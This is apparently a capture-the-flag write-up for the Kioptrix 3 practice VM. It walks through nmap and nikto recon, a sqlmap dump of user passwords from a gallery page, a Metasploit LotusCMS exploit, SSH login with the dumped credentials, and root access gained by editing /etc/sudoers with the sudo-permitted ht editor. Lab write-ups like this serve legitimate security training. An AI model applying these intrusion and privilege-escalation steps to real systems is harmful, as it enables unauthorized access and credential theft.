Kioptrix 3

Kioptrix 1.2 #3

Initial Info

Make sure to Point your host file in your Kali Box to the machines IP.

nano /etc/hosts

Add kioptrix IP and kioptrix3.com like below. Kioptrix3.com

And Just to be sure ping kioptrix3.com to make sure the address is correct. ping

Recon

Scanned Target with nmap.

nmap -p- -sV ipaddress

Found port 80 and 22 open. So we have a web server and ssh available. Unless ssh is a really old version or looks funky I’ll most likely skip it. Port 80 Brings us to a web page, clicking around on the links through the web page you can find a login page that says powered by Lotus CMS. So we need to Google lotus CMS and research known vulnerabilities for it. Reading the blog posts we find information about a gallery app that was recently implemented. Nikto let us know that there was a phpmyadmin directory as well. Let’s see what all we know so far. What we have learned so Far:

  • Apache server on port 80
  • Lotus CMS ??
  • There is a post talking about some handy enumeration info
  • The post leads us to look at gallery app that was freshly implemented
  • Clicking around on the gallery app you can see /gallery/gallery.php?id=1 so its talking to a database
  • Phpmyadmin Directory found via nikto

From the list of what I have learned so far. I know to google Lotus CMS vulnerabilities. I immediately find an exploit that looks promising.

While Looking for this I run sqlmap on http://ipaddress/gallery/gallery.php?id=1 to see if it finds any injections and it ends up dumping the entire database with two users and their passwords.

Local

Well even though I found two users and Passwords with sqlmap I was curious to see if the Lotus cms exploit worked. I loaded Metasploit up and tested it. It didn’t work, but why? It should have. Looking the URI needs to be pointed to the webroot / as this is where the cms framework is hosted. Rerunning the exploit gave me a local meterpreter session. I poked around and found several interesting things, but I wanted to also see if I could ssh as the other users I found.

ssh loneferret@192.168.100.200

Awesome password works and we have local through www and through a local user. Time for more Enumeration !!! let’s find a way to get root.

Priv Esc

Started looking through the user loneferret’s home folder. I found a text file that told all users to use sudo ht or else? What is HT ?

Googling it looked like a hex editor with known vulnerabilities.

sudo ht /etc/sudoers

cool I can edit stuff as root

There is a !/usr/bin/su entry in the sudoers file but it doesn’t work when I edit it.

Using the command below

which ht

We can see it is in /bin/su so we edit the sudoers file and then try again

and root!

Lessons Learned

Always read home directories.

Process of Elimination is your friend.